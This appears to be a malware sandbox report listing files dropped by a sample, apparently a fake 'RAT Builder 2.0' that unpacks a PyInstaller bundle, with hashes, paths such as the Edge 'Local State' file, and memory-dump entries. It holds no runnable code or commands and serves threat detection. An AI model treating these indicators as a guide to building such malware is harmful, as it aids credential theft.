8bf5bbca2101c8c02b9aa2021efeeb9cd66f1d0471b235e3fb6010e87be4af87

SHA512
2d822d73f97e5fd517bf0304c294742219b29309ac94e579b0c8fab06c016d6ba4f0e91ba1b3b38a768326e85d8d87f8ee862b5435112b4a2a18c5673f2b3999

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7c6ba24cf24385458fe5da95777ba970

SHA1
6b7f626cc9c494aaf0aa29d202e30fb181997d7d

SHA256
fc2ad3a781dd4062f1c241313cbeec474bb5e11317589216f2077c699d122056

SHA512
6152e4d33639a8cc55d31365b874939792f53e08102c9ff0b7fca9006b3212096ecc81fe344a6b73c15e07642bd52ddaac294fd2a46cd2c7339e1d9940feebd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_bz2.pyd

Filesize
49KB

MD5
e1b31198135e45800ed416bd05f8362e

SHA1
3f5114446e69f4334fa8cda9cda5a6081bca29ed

SHA256
43f812a27af7e3c6876db1005e0f4fb04db6af83a389e5f00b3f25a66f26eb80

SHA512
6709c58592e89905263894a99dc1d6aafff96ace930bb35abff1270a936c04d3b5f51a70fb5ed03a6449b28cad70551f3dccfdd59f9012b82c060e0668d31733

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_ctypes.pyd

Filesize
63KB

MD5
b6262f9fbdca0fe77e96a9eed25e312f

SHA1
6bfb59be5185ceaca311f7d9ef750a12b971cbd7

SHA256
1c0f9c3bdc53c2b24d5480858377883a002eb2ebb57769d30649868bfb191998

SHA512
768321758fc78e398a1b60d9d0ac6b7dfd7fd429ef138845461389aaa8e74468e4bc337c1db829ba811cb58cc48cfff5c8de325de949dde6d89470342b2c8ce8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_decimal.pyd

Filesize
119KB

MD5
9cfb6d9624033002bc19435bae7ff838

SHA1
d5eecc3778de943873b33c83432323e2b7c2e5c2

SHA256
41b0b60fe2aa2b63c93d3ce9ab69247d440738edb4805f18db3d1daa6bb3ebff

SHA512
dd6d7631a54cbd4abd58b0c5a8cb5a10a468e87019122554467fd1d0669b9a270650928d9de94a7ec059d4acebf39fd1cfcea482fc5b3688e7924aaf1369cc64

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_hashlib.pyd

Filesize
36KB

MD5
0b214888fac908ad036b84e5674539e2

SHA1
4079b274ec8699a216c0962afd2b5137809e9230

SHA256
a9f24ad79a3d2a71b07f93cd56fc71958109f0d1b79eebf703c9ed3ac76525ff

SHA512
ae7aee8a11248f115eb870c403df6fc33785c27962d8593633069c5ff079833e76a74851ef51067ce302b8ea610f9d95c14be5e62228ebd93570c2379a2d4846

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_lzma.pyd

Filesize
87KB

MD5
adeaa96a07b7b595675d9f351bb7a10c

SHA1
484a974913276d236cb0d5db669358e215f7fced

SHA256
3e749f5fad4088a83ae3959825da82f91c44478b4eb74f92387ff50ff1b8647d

SHA512
5d01d85cda1597a00b39746506ff1f0f01eeea1dc2a359fcecc8ee40333613f7040ab6d643fdaee6adaa743d869569b9ab28ae56a32199178681f8ba4dea4e55

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_queue.pyd

Filesize
28KB

MD5
766820215f82330f67e248f21668f0b3

SHA1
5016e869d7f65297f73807ebdaf5ba69b93d82bd

SHA256
ef361936929b70ef85e070ed89e55cbda7837441acafeea7ef7a0bb66addeec6

SHA512
4911b935e39d317630515e9884e6770e3c3cdbd32378b5d4c88af22166b79b8efc21db501f4ffb80668751969154683af379a6806b9cd0c488e322bd00c87d0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\_socket.pyd

Filesize
45KB

MD5
65cd246a4b67cc1eab796e2572c50295

SHA1
053fa69b725f1789c87d0ef30f3d8997d7e97e32

SHA256
4ecd63f5f111d97c2834000ff5605fac61f544e949a0d470aaa467abc10b549c

SHA512
c5bf499cc3038741d04d8b580b54c3b8b919c992366e4f37c1af6321a7c984b2e2251c5b2bc8626aff3d6ca3bf49d6e1ccd803bd99589f41a40f24ec0411db86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\base_library.zip

Filesize
1.3MB

MD5
18c3f8bf07b4764d340df1d612d28fad

SHA1
fc0e09078527c13597c37dbea39551f72bbe9ae8

SHA256
6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

SHA512
135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\blank.aes

Filesize
112KB

MD5
200393eb9e37bb67e1c578e28cec99e9

SHA1
1840b921dfb372c15049cec95e944871639023a5

SHA256
70847bbf37894cb08e88e0211b3f2f1c354daa210d28c13b2270908db97ef5b5

SHA512
9f436971b6fb5a54b1d5c741b4f35f3dba620bb9244a235bb12155320eb672e8099f22f3783d2b20d93f55df7ade64ae34e60f13fd2d25b837efb949124e0b54

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\libcrypto-3.dll

Filesize
1.6MB

MD5
8377fe5949527dd7be7b827cb1ffd324

SHA1
aa483a875cb06a86a371829372980d772fda2bf9

SHA256
88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

SHA512
c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\libssl-3.dll

Filesize
221KB

MD5
b2e766f5cf6f9d4dcbe8537bc5bded2f

SHA1
331269521ce1ab76799e69e9ae1c3b565a838574

SHA256
3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

SHA512
5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\python313.dll

Filesize
1.8MB

MD5
9a3d3ae5745a79d276b05a85aea02549

SHA1
a5e60cac2ca606df4f7646d052a9c0ea813e7636

SHA256
09693bab682495b01de8a24c435ca5900e11d2d0f4f0807dae278b3a94770889

SHA512
46840b820ee3c0fa511596124eb364da993ec7ae1670843a15afd40ac63f2c61846434be84d191bd53f7f5f4e17fad549795822bb2b9c792ac22a1c26e5adf69

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\select.pyd

Filesize
26KB

MD5
933da5361079fc8457e19adab86ff4e0

SHA1
51bccf47008130baadd49a3f55f85fe968177233

SHA256
adfdf84ff4639f8a921b78a2efce1b89265df2b512df05ce2859fc3cc6e33eff

SHA512
0078cd5df1b78d51b0acb717e051e83cb18a9daf499a959da84a331fa7a839eefa303672d741b29ff2e0c34d1ef3f07505609f1102e9e86fab1c9fd066c67570

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\sqlite3.dll

Filesize
645KB

MD5
ff62332fa199145aaf12314dbf9841a3

SHA1
714a50b5351d5c8afddb16a4e51a8998f976da65

SHA256
36e1c70afc8ad8afe4a4f3ef4f133390484bca4ea76941cc55bac7e9df29eefd

SHA512
eeff68432570025550d4c205abf585d2911e0ff59b6eca062dd000087f96c7896be91eda7612666905445627fc3fc974aea7c3428a708c7de2ca14c7bce5cca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26002\unicodedata.pyd

Filesize
262KB

MD5
867ecde9ff7f92d375165ae5f3c439cb

SHA1
37d1ac339eb194ce98548ab4e4963fe30ea792ae

SHA256
a2061ef4df5999ca0498bee2c7dd321359040b1acf08413c944d468969c27579

SHA512
0dce05d080e59f98587bce95b26a3b5d7910d4cb5434339810e2aae8cfe38292f04c3b706fcd84957552041d4d8c9f36a1844a856d1729790160cef296dccfc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ivqhg52x.yzd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
6a63a083469b6c987bf58982aa30ff25

SHA1
e4e8db67f64eb276cfa9ed05bbdc96c2ae56f93e

SHA256
3e14b5d28bf6a39a37cba2ac1dbe0dbe9d3a45f43da30c801c6e678307da7ea6

SHA512
f279a5712351366482c6fcbe8bf8d109626e2d99d1b2e511d3bfea8357d00808af96ce79ebdb1a5131a239379f115e13d502fbe5cb1c62d43abb8c4f1034b2a0

Download Submit
C:\Users\Admin\Downloads\Nitro Generator.zip

Filesize
1.2MB

MD5
707ce8e0edae75a71f4bb7ddccc8b35b

SHA1
3863adbdf17aca29eae01840c999d1e446b2c383

SHA256
a28bf481aac02377aef2e668a51938d0e509946743daf4dac12e5293f552ded3

SHA512
a27ec215b47493511ab88ef039972cf76c05659f82a022ede76dadae5111d12b34f1efb1c6810ae80ae50bb64e95aa8f5366b9647b01ffd2ca98c3c0fbcc17a8

Download Submit
C:\Users\Admin\Downloads\RAT Builder 2.0.zip

Filesize
7.5MB

MD5
53d4377b4d8e24ee080fea736fde87f9

SHA1
a9e8013b8219a6bbe91daca4eb63d04a1c08decb

SHA256
38ef95b1130821f2da93e7c465e184ffe78ad882e9e22b87995e8a065dbdbf6c

SHA512
478d453049d2cf9e2d7f2e49ef49ef24c17785eaacba3d4f16bbf9782d97fa16681e1b5bf6af0eb458e47639501d0095cbc971887c668cfa55cd146b15bf3c19

Download Submit
C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe

Filesize
7.6MB

MD5
aae791c00f43925611641e49d2415274

SHA1
a9248af48d08ef63b040078b8f5f54363cc40ac3

SHA256
2c63541fb4715928a89445bfba852f89200e1a0865c195340ff5d267de32731b

SHA512
9a69a4a6e4ad6873e41a6380af469699bae5546289ed9135ed26969294217e66100703bd8fe48149a78293f5c2c703f4f834fcb31ef32dce176083448c8b09da

Download Submit
C:\Users\Admin\Downloads\RAT Builder 2.0\READ ME!.txt

Filesize
163B

MD5
c7acb06acbdaaf8eecf2be61bb8a82a2

SHA1
dec0323fe47f2c91092112ed41c729b9d980a6b1

SHA256
688606df1a44738d92d007f77d4afa39e87062632e51ff0bd0e4c10081c76af4

SHA512
ff68a01b6a3c10c1f4bed69be97c9e57103d187952c695e5259de89f100807003c2c2b8304d93fa37a753c60ba06ab91e30c44f349fea0114e5bf0aabc2da564

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 810131.crdownload

Filesize
3.1MB

MD5
caf227512fc7884f82daca6b195f8c93

SHA1
084ac541e89ff6e40374366a1efcac95f70ee76b

SHA256
2fa747a0e6505f936d8651f2f8ea18d55b68c4b7469cc4bf73bc4eac9f6189b5

SHA512
311fa0c77cf48f689e64e6cfe696babc14aa39e210d3a44ad65619ad8e0cff26d6cc8273f65b0454ec42e2914ae6f279620b6317692d1db89f5491b09b7d98ce

Download Submit
memory/568-1209-0x0000000000630000-0x0000000000954000-memory.dmp

Filesize
3.1MB

Download
memory/916-1226-0x000000001C130000-0x000000001C1E2000-memory.dmp

Filesize
712KB

Download
memory/916-1225-0x000000001C020000-0x000000001C070000-memory.dmp

Filesize
320KB

Download
memory/2668-982-0x000002378C250000-0x000002378C272000-memory.dmp

Filesize
136KB

Download
memory/4112-944-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp

Filesize
172KB

Download
memory/4112-1246-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp

Filesize
5.2MB

Download
memory/4112-918-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp

Filesize
6.4MB

Download
memory/4112-1178-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp

Filesize
204KB

Download
memory/4112-1180-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp

Filesize
824KB

Download
memory/4112-1181-0x00000225DA1A0000-0x00000225DA6D3000-memory.dmp

Filesize
5.2MB

Download
memory/4112-1183-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp

Filesize
5.2MB

Download
memory/4112-1194-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp

Filesize
6.4MB

Download
memory/4112-1200-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp

Filesize
1.5MB

Download
memory/4112-1091-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp

Filesize
1.5MB

Download
memory/4112-1064-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp

Filesize
148KB

Download
memory/4112-962-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp

Filesize
100KB

Download
memory/4112-1231-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp

Filesize
6.4MB

Download
memory/4112-1256-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp

Filesize
824KB

Download
memory/4112-1255-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp

Filesize
204KB

Download
memory/4112-1254-0x00007FFE3A490000-0x00007FFE3A49D000-memory.dmp

Filesize
52KB

Download
memory/4112-1253-0x00007FFE38F00000-0x00007FFE38F19000-memory.dmp

Filesize
100KB

Download
memory/4112-1252-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp

Filesize
1.5MB

Download
memory/4112-1251-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp

Filesize
148KB

Download
memory/4112-1250-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp

Filesize
100KB

Download
memory/4112-1249-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp

Filesize
172KB

Download
memory/4112-1248-0x00007FFE42950000-0x00007FFE4295F000-memory.dmp

Filesize
60KB

Download
memory/4112-1247-0x00007FFE40260000-0x00007FFE40287000-memory.dmp

Filesize
156KB

Download
memory/4112-923-0x00007FFE40260000-0x00007FFE40287000-memory.dmp

Filesize
156KB

Download
memory/4112-1245-0x00007FFE284D0000-0x00007FFE28583000-memory.dmp

Filesize
716KB

Download
memory/4112-1244-0x00007FFE3A420000-0x00007FFE3A42D000-memory.dmp

Filesize
52KB

Download
memory/4112-1243-0x00007FFE38EA0000-0x00007FFE38EB4000-memory.dmp

Filesize
80KB

Download
memory/4112-963-0x00007FFE284D0000-0x00007FFE28583000-memory.dmp

Filesize
716KB

Download
memory/4112-957-0x00007FFE38F70000-0x00007FFE38F9B000-memory.dmp

Filesize
172KB

Download
memory/4112-958-0x00007FFE3A420000-0x00007FFE3A42D000-memory.dmp

Filesize
52KB

Download
memory/4112-956-0x00007FFE38EA0000-0x00007FFE38EB4000-memory.dmp

Filesize
80KB

Download
memory/4112-952-0x00007FFE28590000-0x00007FFE2865E000-memory.dmp

Filesize
824KB

Download
memory/4112-954-0x00007FFE250D0000-0x00007FFE25603000-memory.dmp

Filesize
5.2MB

Download
memory/4112-955-0x00007FFE40260000-0x00007FFE40287000-memory.dmp

Filesize
156KB

Download
memory/4112-953-0x00000225DA1A0000-0x00000225DA6D3000-memory.dmp

Filesize
5.2MB

Download
memory/4112-951-0x00007FFE25610000-0x00007FFE25C75000-memory.dmp

Filesize
6.4MB

Download
memory/4112-950-0x00007FFE38EC0000-0x00007FFE38EF3000-memory.dmp

Filesize
204KB

Download
memory/4112-949-0x00007FFE3A490000-0x00007FFE3A49D000-memory.dmp

Filesize
52KB

Download
memory/4112-948-0x00007FFE38F00000-0x00007FFE38F19000-memory.dmp

Filesize
100KB

Download
memory/4112-947-0x00007FFE288E0000-0x00007FFE28A5F000-memory.dmp

Filesize
1.5MB

Download
memory/4112-946-0x00007FFE38F20000-0x00007FFE38F45000-memory.dmp

Filesize
148KB

Download
memory/4112-945-0x00007FFE38F50000-0x00007FFE38F69000-memory.dmp

Filesize
100KB

Download
memory/4112-939-0x00007FFE42950000-0x00007FFE4295F000-memory.dmp

Filesize
60KB

Download
memory/4684-1101-0x0000029E8AEA0000-0x0000029E8B961000-memory.dmp

Filesize
10.8MB

Download
memory/5676-1102-0x0000019E69ED0000-0x0000019E69ED8000-memory.dmp

Filesize
32KB

Download